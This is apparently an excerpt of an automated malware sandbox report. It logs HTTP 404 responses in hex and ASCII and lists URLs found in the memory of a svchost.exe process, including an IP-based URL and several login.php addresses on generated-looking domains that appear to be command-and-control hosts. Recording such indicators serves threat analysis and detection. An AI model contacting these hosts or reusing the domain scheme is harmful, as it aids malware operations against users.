0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:54 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:25:49 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:26:00 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:26:01 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:26:04 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:26:05 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: svchost.exe, 00000002.00000003.1754819531.0000000005A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564047923.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1563997171.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564047923.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682996200.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735700800.0000000000873000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544003881.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfeb.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfih.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhez.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhis.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, 